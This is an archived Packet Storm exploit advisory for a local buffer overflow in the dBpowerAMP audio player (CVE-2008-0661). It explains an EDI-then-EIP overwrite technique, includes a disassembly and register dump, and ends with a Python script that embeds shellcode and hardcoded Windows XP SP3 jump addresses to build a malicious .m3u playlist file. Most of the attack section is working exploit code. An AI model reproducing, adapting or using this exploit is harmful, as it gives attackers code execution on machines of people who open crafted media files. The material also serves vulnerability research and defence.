dBpowerAMP Audio Player Buffer Overflow

2010-09-01T00:00:00
ID PACKETSTORM:93388
Type packetstorm
Reporter FB1H2S
Modified 2010-09-01T00:00:00

Description

                                        
                                            `# Exploit Title: dbpoweramp local buffer overflow, a different approch  
# Date: 31/8/2010  
# Author: 41.w4r10r and FB1H2S  
# Software Link: http://usfiles.brothersoft.com/mp3_audio/players/dBpowerAMP-r2.exe  
# Version: [app version]  
# Tested on: Microsoft XP service pack 3  
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0661  
  
The local exploit which was published http://www.exploit-db.com/exploits/5069 http://www.exploit-db.com/exploits/5067, the software had an overflow,   
which could be exploited if passed in with a 255 char string, it would overwrite the EIP, but if the string goes above 255 the EIP wont be   
overwritten insted the EDI would be. The published exploit uses a direct EIP overwrite using a 255 char ( shellcode + junk ).  
But it is possible to exploit the appplication with a 255+ char in the follwoing way.  
  
1) 270 chars overwrite the EDI and EIP remains intact  
2) EDI Destination index points to our junk now, and we got controll over EDI  
3) EDI points to a data, so overwrite it to point to EDX which also hold our junk, a jump EDX will work  
4) Now EIP will be overwritten, so on second step make EIP point to EDI and we could run our arbitary code.  
  
################################################################################################  
At the time of 255+ char the assembled code gives idea whats happening  
################################################################################################  
00422BD0 /$ 56 PUSH ESI  
00422BD1 |. 57 PUSH EDI  
00422BD2 |. 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C]  
00422BD6 |. 83C9 FF OR ECX,FFFFFFFF  
00422BD9 |. 33C0 XOR EAX,EAX  
00422BDB |. 6A 5C PUSH 5C ; /c = 5C ('\')  
00422BDD |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; | Repeat and   
00422BDF |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14] ; |  
00422BE3 |. F7D1 NOT ECX ; |  
00422BE5 |. 2BF9 SUB EDI,ECX ; |  
00422BE7 |. 50 PUSH EAX ; |s  
00422BE8 |. 8BD1 MOV EDX,ECX ; |  
00422BEA |. 8BF7 MOV ESI,EDI ; |  
00422BEC |. 8BF8 MOV EDI,EAX ; |  
00422BEE |. C1E9 02 SHR ECX,2 ; |  
00422BF1 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>; |  
00422BF3 |. 8BCA MOV ECX,EDX ; |  
00422BF5 |. 83E1 03 AND ECX,3 ; |  
00422BF8 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |  
00422BFA |. FF15 E4A14200 CALL DWORD PTR DS:[<&MSVCRT.strrchr>] ; \strrchr  
00422C00 |. 83C4 08 ADD ESP,8  
  
#The registers at the time of the oveflow  
  
EAX 00000000  
ECX FFFFFFFF  
EDX 00B9ECD8 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]  
EBX 00B9F110 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]  
ESP 00B9ECB4  
EBP 77C3F931 msvcrt.sprintf  
ESI 00B9F285  
EDI 41414141  
EIP 00422BDD Amp.00422BDD  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 0 SS 0023 32bit 0(FFFFFFFF)  
Z 1 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDC000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)  
ST0 empty -??? FFFF 00000000 7C90E920  
ST1 empty +UNORM 0060 00140000 00000000  
ST2 empty 0.0000000076189029870e-4933  
ST3 empty 0.0208724709907450280e-4933  
ST4 empty +UNORM 770A 0012F850 00000000  
ST5 empty 0.0208724786043381110e-4933  
ST6 empty +UNORM 2CCE 0012F588 00890000  
ST7 empty -??? FFFF 7C919318 7C90E920  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
##############################################################################################################################  
#!/usr/bin/python  
#  
#And all greets to Garage Hackers Members.  
#http://www.garage4hackers.com  
#And shouts to ICW, Andhra Hackers members  
#  
#and our Brothers:-  
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Yash,Secure_IT, Atul, Vinnu and all others.   
#  
#  
#  
#  
shellcode= ("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"  
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"  
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"   
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"   
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"   
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"   
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"   
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"   
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"   
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"  
"\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")  
leng=260-len(shellcode)  
junk = shellcode+"D"*leng  
print len(junk)  
junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"  
#######################################################################################################################  
#Make EDI point to EDX using a jump EDX, DCBA\xD8\xEC\xB9\x00 from application  
#now we ill get controll over EIP Now point EIP point to EDI [ #jmp edi \xF0\xB0\x80\x7C from kernal 32.dll Microsoft Service pack 3 ]   
#######################################################################################################################  
filename = "garage4hackers.m3u";  
file = open(filename,"w")   
file.writelines(junk)  
file.close()  
print "File Is created"  
print "Press Any Key To Continue........."  
raw_input()  
`